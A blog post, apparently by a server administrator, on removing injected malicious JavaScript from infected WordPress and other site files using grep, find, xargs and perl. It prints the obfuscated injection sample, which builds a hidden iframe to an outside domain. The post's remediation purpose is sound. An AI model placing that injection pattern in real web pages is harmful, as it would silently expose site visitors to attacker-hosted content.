Lately, many servers have been attacked and had malware injected into their files as an IFRAME or script code. Most of the infected websites were blogs (WordPress), which led to every website on the server being infected.

For the last 2 days I've been fighting this, and I found a neat set of steps to clean all the files on a server without worrying about deleting your old files. Let's start.

Assume you're infected with code like this:

[js]

var usikwseoomg = ‘PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66’;

var nimbchnzujc = ‘PaBUTyjaZYg72’;

var szwtgmqzekr = ‘PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22’;

var yvofadunjkv = ‘PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76’;

var ylydzxyjaci = ‘PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22’;

var xwojmnoxfbs = ‘PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22’;

var mgsybgilcfx = ‘PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f’;

var nixyhgyjouf = ‘koska.sytes.net/phl/logs/index.php’;

var nesrtqwuirb = (yydszqnduko.toString().replace(/PaBUTyjaZYg/g, ‘%’)));

[/js]

The first thing to do is find out which file types are infected on your server, so do a global search in /home/ using grep with part of the code, in this case the domain name “koska.sytes.net”.

You need root access.
Disable the FTP service.

[bash]grep -R "koska.sytes.net" /home/ >/root/moe/all.txt[/bash]

We save all the output in that file, all.txt.

The result: php, html and htm were the file extensions targeted.

Now we can start cleaning up the code. We need to delete these lines from all files while keeping a copy of every file, just to make sure we did it right. For that we use a small but complex command:

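[bash]
# -print0 / -0 keep file names containing spaces intact; -i.save keeps a backup of each file
find /home/ -type f -name '*.html' -print0 | xargs -0 perl -pi.save -e 's/<script.*PaBUTyjaZYg.*script>//g;'
[/bash]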

The first part finds all files under /home with the html extension. xargs then runs the perl command, which deletes anything that starts with <script, ends with script> and contains PaBUTyjaZYg, and keeps a backup copy of each file with a name ending in .save. Note that `.*` is greedy: on a line holding several script tags, everything from the first <script to the last script> is removed, so compare a few cleaned files against their .save copies before going further.

PS: there is a limit to the number of arguments allowed on a single command line. That is why we use xargs to build this command, since we have a huge number of files to search and clean.

Now we re-run the same command with the extension changed to php, then htm, and so on, until we have covered every extension we need to clean. Once we are done, we delete the *.save backup files using the following command:

[bash]find /home/  -type f -name "*.save" -exec rm -f {} \;[/bash]

Then we run the first command again :) (the search one) to make sure everything is clean:

[bash]grep -R "koska.sytes.net" /home/ >/root/moe/cleanr.txt[/bash]

We should get an empty file :)

LAST thing: don't start the FTP service and upload files again until you have scanned your computer. You're the source of the problem, and the malware will use the FTP access again to inject your files if your computer is still infected.